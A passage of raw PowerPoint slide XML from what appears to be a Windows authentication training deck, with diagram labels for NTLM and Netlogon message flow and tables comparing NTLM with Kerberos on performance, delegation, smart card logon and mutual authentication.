              <a:ext cx="1633795" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NTLM_NEGOTIATE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="Group 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2160901" y="5373658"/>
            <a:ext cx="4203628" cy="430887"/>
            <a:chOff x="2160901" y="5373658"/>
            <a:chExt cx="4203628" cy="430887"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="Straight Arrow Connector 23"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2160901" y="5551720"/>
              <a:ext cx="4203628"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797527" y="5373658"/>
              <a:ext cx="3153107" cy="430887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Application Messages (Embedded errors or connection drop if </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>auth</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> failed)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 6" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ SECURITY ICONS\Security secure Upload server.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71806" y="1095390"/>
            <a:ext cx="1006502" cy="149337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4586068" y="2715066"/>
            <a:ext cx="2726092" cy="1169765"/>
            <a:chOff x="4586068" y="2715066"/>
            <a:chExt cx="2726092" cy="1169765"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4586068" y="2715066"/>
              <a:ext cx="2377440" cy="1169765"/>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1640662">
              <a:off x="4691375" y="3342168"/>
              <a:ext cx="2620785" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NETLOGON_NETWORK_INFO</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4562421" y="2489982"/>
            <a:ext cx="2766847" cy="1209821"/>
            <a:chOff x="4562421" y="2489982"/>
            <a:chExt cx="2766847" cy="1209821"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5008098" y="2489982"/>
              <a:ext cx="2321170" cy="1209821"/>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1640662">
              <a:off x="4562421" y="2725669"/>
              <a:ext cx="2620785" cy="430887"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NETLOGON_VALIDATION_SAM_INFO4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2139864" y="4636166"/>
            <a:ext cx="4203628" cy="560110"/>
            <a:chOff x="2139864" y="4636166"/>
            <a:chExt cx="4203628" cy="560110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2139864" y="4656205"/>
              <a:ext cx="4203628" cy="215444"/>
              <a:chOff x="2139864" y="4656205"/>
              <a:chExt cx="4203628" cy="215444"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="2139864" y="4757545"/>
                <a:ext cx="4203628"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514976" y="4656205"/>
                <a:ext cx="1760402" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>NTLM_CHALLENGE</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 3" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ MSN ICONS\MSN icon envelope email mail lette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37021" y="4636166"/>
              <a:ext cx="539489" cy="560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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2151584" y="4934105"/>
            <a:ext cx="4279828" cy="582630"/>
            <a:chOff x="2151584" y="4934105"/>
            <a:chExt cx="4279828" cy="582630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2151584" y="5115412"/>
              <a:ext cx="4279828"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582971" y="5033682"/>
              <a:ext cx="1633795" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NTLM_RESPONSE</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 3" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ MSN ICONS\MSN icon envelope email mail lette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89759" y="4956625"/>
              <a:ext cx="539489" cy="56011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5" descr="C:\Users\administrator\Pictures\DVD_ART36\Artwork_Imagery\Icons - Illustrations\_ WINDOWS SERVER ICONS\Security\Key secure lock security 2.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="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35848" y="4934105"/>
              <a:ext cx="419942" cy="35874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0793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right)">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right)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="5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left)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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down)">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up)">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right)">
                                      <p:cBhvr>
                                        <p:cTn id="5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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM versus Kerberos</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM passes the credentials through he target server to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The target servers domain controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To the account‘s domain controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That can create a bottleneck</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="atl_TokenExpansionDifferentDomain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924944"/>
            <a:ext cx="79057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F:\DVD_June2011\Artwork_Imagery\Icons - Illustrations\Misc\Thunderbolt electricity blue edge ligh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804516">
            <a:off x="4261620" y="3564086"/>
            <a:ext cx="1112056" cy="3013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F:\DVD_June2011\Artwork_Imagery\Icons - Illustrations\Misc\Thunderbolt electricity blue edge ligh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343747">
            <a:off x="5877823" y="4659793"/>
            <a:ext cx="1112056" cy="301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29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5"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="967320497"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="389674" y="908720"/>
          <a:ext cx="8363700" cy="4790440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr rtl="1" firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4181850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4181850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>NTLM</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Kerberos</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Challenge-Response</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Ticket</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> based authentication</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Microsoft proprietary</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> protocol</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Standard</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> protocol can be used across different implementations</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
                        <a:t>server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t> contacts the DC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> to validate the client’s response for the challenge (known as pass-through authentication)</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>The</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" u="sng" baseline="0" dirty="0"/>
                        <a:t>client</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> contacts the DC to retrieve a ticket for the service.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Pass-through</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> authentication is needed for each session and therefore the DC is contacted each time.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Faster! The client</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> manages a tickets cache. No need to contact the DC for additional sessions to the same service if the ticket is still valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Supports only impersonation</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Supports impersonation and delegation</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos vs NTLM authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386554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5"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057679038"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="389674" y="908720"/>
          <a:ext cx="8363700" cy="2565400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr rtl="1" firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4181850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4181850">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>NTLM</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0"/>
                        <a:t>Kerberos</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>No native smart card logon</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Supports Smart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> card logon</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Client</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> authentication only (a risk of spoofed server)</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Mutual authentication</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> is possible (client + server)</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Supported also</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> on pre-windows 2000 versions.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" rtl="0"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0"/>
                        <a:t>Supported</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" baseline="0" dirty="0"/>
                        <a:t> on windows 2000 and above</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
